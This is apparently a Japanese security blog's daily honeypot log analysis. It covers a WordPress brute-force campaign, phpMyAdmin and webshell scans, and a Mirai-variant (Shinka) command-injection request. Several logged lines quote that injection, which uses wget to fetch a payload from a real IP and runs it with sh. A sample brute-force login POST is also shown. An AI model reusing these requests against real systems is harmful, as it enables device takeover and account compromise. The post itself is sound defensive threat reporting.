S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/24)

ハニーポットのログ分析(2018/08/24)

honeypot

WOWhoneypotの2018/08/24(金) (運用82日目)の簡易分析です。
本日の総アクセス件数は 6546件です。一瞬目を疑うような過去最大規模のアクセスです。
以下が全アクセスログです。

1576 2018-08-24 POST //wp-login.php
1575 2018-08-24 POST /wp//wp-login.php
1575 2018-08-24 POST /wordpress//wp-login.php
1575 2018-08-24 POST /blog//wp-login.php
24 2018-08-24 GET /
13 2018-08-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
4 2018-08-24 POST /qq.php
2 2018-08-24 POST /xx.php
2 2018-08-24 POST /q.php
2 2018-08-24 POST /qaq.php
2 2018-08-24 GET /www/phpMyAdmin/index.php
2 2018-08-24 GET /web/phpMyAdmin/index.php
2 2018-08-24 GET /tools/phpMyAdmin/index.php
2 2018-08-24 GET /shell.php
2 2018-08-24 GET /phpMyAdmin/index.php
2 2018-08-24 GET /index.action
2 2018-08-24 GET /claroline/phpMyAdmin/index.php
2 2018-08-24 GET /admin/phpMyAdmin/index.php
1 2018-08-24 PROPFIND /
1 2018-08-24 POST /zuoshou.php
1 2018-08-24 POST /zuo.php
1 2018-08-24 POST /yumo.php
1 2018-08-24 POST /yao.php
1 2018-08-24 POST /xw.php
1 2018-08-24 POST /xw1.php
1 2018-08-24 POST /xshell.php
1 2018-08-24 POST /xiao.php
1 2018-08-24 POST /xiaomar.php
1 2018-08-24 POST /xiaoma.php
1 2018-08-24 POST /xiaomae.php
1 2018-08-24 POST /wshell.php
1 2018-08-24 POST /w.php
1 2018-08-24 POST /wp-admins.php
1 2018-08-24 POST /weixiao.php
1 2018-08-24 POST /webslee.php
1 2018-08-24 POST /wc.php
1 2018-08-24 POST /wan.php
1 2018-08-24 POST /wanan.php
1 2018-08-24 POST /test.php
1 2018-08-24 POST /system.php
1 2018-08-24 POST /ssaa.php
1 2018-08-24 POST /s.php
1 2018-08-24 POST /sheep.php
1 2018-08-24 POST /qwe.php
1 2018-08-24 POST /post.php
1 2018-08-24 POST /phpstudy.php
1 2018-08-24 POST /phpinfi.php
1 2018-08-24 POST /pe.php
1 2018-08-24 POST /mz.php
1 2018-08-24 POST /m.php?pbid=open
1 2018-08-24 POST /min.php
1 2018-08-24 POST /log.php
1 2018-08-24 POST /lindex.php
1 2018-08-24 POST /l8.php
1 2018-08-24 POST /l7.php
1 2018-08-24 POST /ip.php
1 2018-08-24 POST /infoo.php
1 2018-08-24 POST /hm.php
1 2018-08-24 POST /hh.php
1 2018-08-24 POST /h1.php
1 2018-08-24 POST /feixiang.php
1 2018-08-24 POST /fack.php
1 2018-08-24 POST /defect.php
1 2018-08-24 POST /db_session.init.php
1 2018-08-24 POST /db.init.php
1 2018-08-24 POST /db__.init.php
1 2018-08-24 POST /db_desql.php
1 2018-08-24 POST /db_dataml.php
1 2018-08-24 POST /data.php
1 2018-08-24 POST /conflg.php
1 2018-08-24 POST /cmd.php
1 2018-08-24 POST /cainiao.php
1 2018-08-24 POST /bak.php
1 2018-08-24 POST /aw.php
1 2018-08-24 POST /aotu.php
1 2018-08-24 POST /angge.php
1 2018-08-24 POST /ak.php
1 2018-08-24 POST /ak48.php
1 2018-08-24 POST /ak47.php
1 2018-08-24 POST /aaaa.php
1 2018-08-24 POST /9678.php
1 2018-08-24 POST /9510.php
1 2018-08-24 POST /56.php
1 2018-08-24 POST /3.php
1 2018-08-24 POST /12.php
1 2018-08-24 POST /1213.php
1 2018-08-24 GET /z.php
1 2018-08-24 GET /x.php
1 2018-08-24 GET /xmlrpc.php
1 2018-08-24 GET /xampp/phpmyadmin/index.php
1 2018-08-24 GET /wp//wp-login.php
1 2018-08-24 GET /wpo.php
1 2018-08-24 GET //wp-login.php
1 2018-08-24 GET /wp-config.php
1 2018-08-24 GET /wp/?author=9
1 2018-08-24 GET /wp/?author=8
1 2018-08-24 GET /wp/?author=7
1 2018-08-24 GET /wp/?author=6
1 2018-08-24 GET /wp/?author=5
1 2018-08-24 GET /wp/?author=4
1 2018-08-24 GET /wp/?author=3
1 2018-08-24 GET /wp/?author=2
1 2018-08-24 GET /wp/?author=10
1 2018-08-24 GET /wp/?author=1
1 2018-08-24 GET /wordpress//wp-login.php
1 2018-08-24 GET /wordpress/?author=9
1 2018-08-24 GET /wordpress/?author=8
1 2018-08-24 GET /wordpress/?author=7
1 2018-08-24 GET /wordpress/?author=6
1 2018-08-24 GET /wordpress/?author=5
1 2018-08-24 GET /wordpress/?author=4
1 2018-08-24 GET /wordpress/?author=3
1 2018-08-24 GET /wordpress/?author=2
1 2018-08-24 GET /wordpress/?author=10
1 2018-08-24 GET /wordpress/?author=1
1 2018-08-24 GET /webdav/
1 2018-08-24 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-24 GET /uploader.php
1 2018-08-24 GET /typo3/phpmyadmin/index.php
1 2018-08-24 GET /text.php
1 2018-08-24 GET /_query.php
1 2018-08-24 GET /pmd_online.php
1 2018-08-24 GET /pmd/index.php
1 2018-08-24 GET /pma/scripts/setup.php
1 2018-08-24 GET /pma-old/index.php
1 2018-08-24 GET /pmamy/index.php
1 2018-08-24 GET /pmamy2/index.php
1 2018-08-24 GET /PMA/index.php
1 2018-08-24 GET /pma/index.php
1 2018-08-24 GET /PMA2/index.php
1 2018-08-24 GET /phpMyAdmin/scripts/setup.php
1 2018-08-24 GET /phpmyadmin/scripts/setup.php
1 2018-08-24 GET /phpmyadmin/phpmyadmin/index.php
1 2018-08-24 GET /phpMyAdminold/index.php
1 2018-08-24 GET /phpmyadmin-old/index.php
1 2018-08-24 GET /phpmyadmin/index.php
1 2018-08-24 GET /phpMyadmin_bak/index.php
1 2018-08-24 GET /phpmyadmin2/index.php
1 2018-08-24 GET /phpmyadmin1/index.php
1 2018-08-24 GET /phpmyadmin0/index.php
1 2018-08-24 GET /phpma/index.php
1 2018-08-24 GET /phpadmin/index.php
1 2018-08-24 GET /mysql/index.php
1 2018-08-24 GET /mysqladmin/index.php
1 2018-08-24 GET /mysql-admin/index.php
1 2018-08-24 GET /MyAdmin/scripts/setup.php
1 2018-08-24 GET /myadmin/scripts/setup.php
1 2018-08-24 GET /myadmin/index.php
1 2018-08-24 GET /myadmin2/index.php
1 2018-08-24 GET /muhstiks.php
1 2018-08-24 GET /muhstik-dpr.php
1 2018-08-24 GET /muhstik2.php
1 2018-08-24 GET /lol.php
1 2018-08-24 GET /log.php
1 2018-08-24 GET /logon.php
1 2018-08-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$
1 2018-08-24 GET /license.php
1 2018-08-24 GET /lala.php
1 2018-08-24 GET /knal.php
1 2018-08-24 GET /java.php
1 2018-08-24 GET /index.php
1 2018-08-24 GET /help.php
1 2018-08-24 GET /help-e.php
1 2018-08-24 GET /hell.php
1 2018-08-24 GET /desktop.ini.php
1 2018-08-24 GET /db/index.php
1 2018-08-24 GET /db_cts.php
1 2018-08-24 GET /dbadmin/index.php
1 2018-08-24 GET /cmx.php
1 2018-08-24 GET /cmv.php
1 2018-08-24 GET /cmd.php
1 2018-08-24 GET /cmdd.php
1 2018-08-24 GET /blog//wp-login.php
1 2018-08-24 GET /blog/?author=9
1 2018-08-24 GET /blog/?author=8
1 2018-08-24 GET /blog/?author=7
1 2018-08-24 GET /blog/?author=6
1 2018-08-24 GET /blog/?author=5
1 2018-08-24 GET /blog/?author=4
1 2018-08-24 GET /blog/?author=3
1 2018-08-24 GET /blog/?author=2
1 2018-08-24 GET /blog/?author=10
1 2018-08-24 GET /blog/?author=1
1 2018-08-24 GET /?author=9
1 2018-08-24 GET /?author=8
1 2018-08-24 GET /?author=7
1 2018-08-24 GET /?author=6
1 2018-08-24 GET /?author=5
1 2018-08-24 GET /?author=4
1 2018-08-24 GET /?author=3
1 2018-08-24 GET /?author=2
1 2018-08-24 GET /?author=10
1 2018-08-24 GET /?author=1
1 2018-08-24 GET /admin/PMA/index.php
1 2018-08-24 GET /admin/pma/index.php
1 2018-08-24 GET /admin/phpmyadmin/index.php
1 2018-08-24 GET /admin/phpmyadmin2/index.php
1 2018-08-24 GET /admin/mysql/index.php
1 2018-08-24 GET /admin/mysql2/index.php
1 2018-08-24 GET /admin/index.php 

 

以下は単一IPからのWordPress脆弱性を狙ったと思われるアクセスです。

1576 2018-08-24 POST //wp-login.php
1575 2018-08-24 POST /wp//wp-login.php
1575 2018-08-24 POST /wordpress//wp-login.php
1575 2018-08-24 POST /blog//wp-login.php
1 2018-08-24 GET /wp//wp-login.php
1 2018-08-24 GET //wp-login.php
1 2018-08-24 GET /wp/?author=1
1 2018-08-24 GET /wp/?author=2
1 2018-08-24 GET /wp/?author=3
1 2018-08-24 GET /wp/?author=4
1 2018-08-24 GET /wp/?author=5
1 2018-08-24 GET /wp/?author=6
1 2018-08-24 GET /wp/?author=7
1 2018-08-24 GET /wp/?author=8
1 2018-08-24 GET /wp/?author=9
1 2018-08-24 GET /wp/?author=10
1 2018-08-24 GET /wordpress//wp-login.php
1 2018-08-24 GET /wordpress/?author=1
1 2018-08-24 GET /wordpress/?author=2
1 2018-08-24 GET /wordpress/?author=3
1 2018-08-24 GET /wordpress/?author=4
1 2018-08-24 GET /wordpress/?author=5
1 2018-08-24 GET /wordpress/?author=6
1 2018-08-24 GET /wordpress/?author=7
1 2018-08-24 GET /wordpress/?author=8
1 2018-08-24 GET /wordpress/?author=9
1 2018-08-24 GET /wordpress/?author=10
1 2018-08-24 GET /blog//wp-login.php
1 2018-08-24 GET /blog/?author=1
1 2018-08-24 GET /blog/?author=2
1 2018-08-24 GET /blog/?author=3
1 2018-08-24 GET /blog/?author=4
1 2018-08-24 GET /blog/?author=5
1 2018-08-24 GET /blog/?author=6
1 2018-08-24 GET /blog/?author=7
1 2018-08-24 GET /blog/?author=8
1 2018-08-24 GET /blog/?author=9
1 2018-08-24 GET /blog/?author=10
1 2018-08-24 GET /?author=1
1 2018-08-24 GET /?author=2
1 2018-08-24 GET /?author=3
1 2018-08-24 GET /?author=4
1 2018-08-24 GET /?author=5
1 2018-08-24 GET /?author=6
1 2018-08-24 GET /?author=7
1 2018-08-24 GET /?author=8
1 2018-08-24 GET /?author=9
1 2018-08-24 GET /?author=10

特徴としては、以下です。ID/PWを様々な組み合わせでブルートフォース攻撃をしています。

TE: deflate,gzip;q=0.3
Connection: Close, TE
Pragma: no-cache
Accept: */*
Accept-Language: pt-brUser-Agent: Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check
Cookie2: $Version="1"
Content-Length: 108

log=admin&pwd=admin&wp-submit=Login&redirect_to=http://(IP)/wp-admin/&testcookie=1

ブルートフォース攻撃の対象となっているのは、IDがwebmaster,root,adminです。PWは様々です。

 

その他、phpMyAdmin関連(47件)とphpに対する調査・攻撃(107件)と/へのアクセスを除外したアクセス数です。

13 2018-08-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
2 2018-08-24 GET /index.action
1 2018-08-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$
1 2018-08-24 POST /wp-admins.php
1 2018-08-24 GET /webdav/
1 2018-08-24 GET /w00tw00t.at.blackhats.romanian.anti-sec:)

Mirai亜種のShinka/1.0はまたアクセス数がおおくなっています。定期的に増減を繰り返しながら、様々な脆弱性をつくようにしていると思われます。

Struts2脆弱性をつくものは、S2-045とこれまでと変化はありません。

 

本日のハンティングログは以下です。Mirai亜種です。

14 2018-08-24 wget hxxp://209.141.33[.]86/d

以上です。